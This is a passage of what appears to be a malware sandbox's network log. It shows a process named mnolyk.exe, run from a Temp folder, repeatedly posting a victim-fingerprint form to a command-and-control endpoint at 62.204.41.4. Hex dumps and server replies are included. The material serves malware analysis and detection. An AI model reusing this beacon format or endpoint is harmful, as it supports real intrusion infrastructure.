                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:32.178369999 CET  640  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            452  192.168.2.4  50147  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:32.357167959 CET  641  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:32.422908068 CET  641  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            453  192.168.2.4  50148  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:32.593658924 CET  642  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:32.657764912 CET  642  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            454  192.168.2.4  50149  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:32.825799942 CET  643  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:32.889460087 CET  643  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            455  192.168.2.4  50150  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:33.073470116 CET  644  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:33.136670113 CET  644  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            456  192.168.2.4  50151  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:33.307816029 CET  645  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:33.370755911 CET  645  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            457  192.168.2.4  50152  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:33.546077967 CET  646  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:33.608844042 CET  646  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            458  192.168.2.4  50153  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:33.775747061 CET  647  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:33.838745117 CET  647  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            459  192.168.2.4  50154  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:34.013056993 CET  648  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:34.077205896 CET  648  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            46  192.168.2.4  49741  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:37:38.059834957 CET  235  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:38.128957033 CET  235  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            460  192.168.2.4  50155  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:34.245100021 CET  649  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:34.308211088 CET  649  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            461  192.168.2.4  50156  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:34.495754004 CET  650  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:34.559389114 CET  650  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            462  192.168.2.4  50157  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:34.733705997 CET  651  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:34.797499895 CET  651  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            463  192.168.2.4  50158  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:34.968887091 CET  652  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:35.034178972 CET  652  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            464  192.168.2.4  50159  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:35.215446949 CET  653  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:35.279859066 CET  653  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            465  192.168.2.4  50160  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:35.471399069 CET  654  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:35.535490036 CET  654  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            466  192.168.2.4  50161  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:35.717279911 CET  655  OUT  POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:35.779613018 CET  655  IN  HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            467 | 192.168.2.4 | 50162 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:35.950587034 CET | 656 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:36.017430067 CET | 656 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            468 | 192.168.2.4 | 50163 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:36.189852953 CET | 657 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:36.258935928 CET | 657 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            469 | 192.168.2.4 | 50164 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:36.434453011 CET | 658 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:36.497564077 CET | 658 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            47 | 192.168.2.4 | 49742 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:38.312283039 CET | 236 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:38.375379086 CET | 236 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            470 | 192.168.2.4 | 50165 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
